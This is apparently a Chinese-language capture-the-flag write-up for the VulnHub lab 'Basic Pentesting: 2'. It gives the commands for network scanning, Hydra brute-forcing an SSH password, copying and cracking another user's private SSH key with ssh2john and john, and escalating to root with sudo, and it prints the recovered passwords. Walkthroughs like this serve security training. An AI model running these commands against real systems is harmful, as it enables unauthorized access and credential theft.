靶机地址:Basic Pentesting: 2 ~ VulnHub
攻击机kali和靶机要设在同一网段,查看靶机MAC地址:
一、信息收集
扫描目标主机
arp-scan -l
使用nmap扫描靶机开放的端口:
nmap -A -sS -sV -v -p- 192.168.7.127
浏览器访问80端口:
知道系统是Linux的Ubuntu系统,使用如下命令,来收集靶场系统的用户信息,发现靶场的两个用户,kay和jan
enum4linux 192.168.7.127
尝试使用Hydra九头蛇,使用字典“rockyou.txt”来爆破一下jan用户的密码,输入以下命令,得到密码:armando
hydra -l jan -P /usr/share/wordlists/rockyou.txt 192.168.7.127 ssh
尝试进行ssh登录:
发现jan是普通用户,不能使用sudo命令
查看其它目录,再家目录下发现jan和kay两个目录
cd /home
ls -al
在/kay目录下有个pass.bak文件但是无法在jan账户下查看,被拒绝;
来到/home/kay/.ssh目录下,发现有ssh的公钥和私钥信息
将看到的私钥信息复制下来,在kali攻击机中,创建一个名字为key的文件保存私钥信息,之后使用如下命令,将密钥信息,转化为HASH信息;
python /usr/share/john/ssh2john.py key > ssh_login
然后使用命令john ssh_login,破解私钥信息,获得kay账号的密码信息:beeswax
二、SSH连接
输入如下命令,将私钥文件设置为可以使用的权限
chmod 700 key
接着尝试使用该密钥登录到用户 kay,登录成功
ssh -i key kay@192.168.7.127
输入命令ls -al,再次看到passwd.bak文件,这次可以使用cat命令查看了,发现是密码:heresareallystrongpasswordthatfollowsthepasswordpolicy$$
三、权限提升
输入命令,sudo -l,输入密码,成功显示权限信息
输入sudo su
提权成功!
成功查看flag.txt文件......